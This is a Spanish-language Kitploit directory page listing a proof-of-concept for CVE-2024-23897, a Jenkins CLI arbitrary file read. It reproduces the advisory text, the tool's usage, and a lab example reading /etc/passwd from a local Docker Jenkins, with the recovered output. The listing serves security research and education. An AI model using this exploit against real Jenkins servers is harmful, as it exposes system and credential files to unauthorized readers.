Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-23897 — Este repositorio presenta una prueba de concepto de CVE-2024-23897 | Kitploit
Herramientas/GitHubGitHub/vozec/cve-2024-23897
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubvozec/cve-2024-23897

CVE-2024-23897

Este repositorio presenta una prueba de concepto de CVE-2024-23897

Ver Repositorio
173hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-23897

Este repositorio presenta una prueba de concepto de CVE-2024-23897 (Descubierto por sonarsource)

CVE-2024-23897 | Lectura de archivos en jenkins

Descargo de responsabilidad

Este código es una prueba de concepto de la vulnerabilidad; no estoy animando a nadie a usarlo en instancias de confluence que no posean.
Esta herramienta ha sido desarrollada únicamente con fines de investigación y educativos, y no seré responsable de cualquier uso que puedas hacer de ella.

Descripción

Según el Aviso de seguridad de Jenkins 2024-01-24: Jenkins utiliza la biblioteca args4j para analizar argumentos y opciones de comando en el controlador de Jenkins al procesar comandos CLI. Este analizador de comandos tiene una característica que reemplaza un carácter @ seguido de una ruta de archivo en un argumento con el contenido del archivo (expandAtFiles). Esta característica está habilitada por defecto y Jenkins 2.441 y anteriores, LTS 2.426.2 y anteriores, no la deshabilitan. Esto permite a los atacantes leer archivos arbitrarios en el sistema de archivos del controlador de Jenkins utilizando la codificación de caracteres por defecto del proceso del controlador de Jenkins.

  • Los atacantes con permiso Overall/Read pueden leer archivos completos.
  • Los atacantes sin permiso Overall/Read pueden leer las primeras líneas de los archivos.

Ayuda

Descargar herramienta
root@kitploit:~
$ python3 CVE-2024-23897.py -h
usage: CVE-2024-23897.py [-h] -u URL -f FILENAME

This is a POC for CVE-2024-23897 (Jenkins file read)

options:
  -h, --help   show this help message and exit
  -u URL       Url
  -f FILENAME  Filename

Ejemplo

root@kitploit:~
docker pull jenkins/jenkins:2.440-jdk17
docker run  -p 8080:8080 jenkins/jenkins:2.440-jdk17
root@kitploit:~
$ python3 CVE-2024-23897.py -u http://127.0.0.1:8080 -f '/etc/passwd'
[+] Trying to recover /etc/passwd
[+] Data recovered:

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

Referencias:

  • https://www.jenkins.io/security/advisory/2024-01-24/
  • https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/
  • https://twitter.com/zin_min_phyo/status/1750827780856816063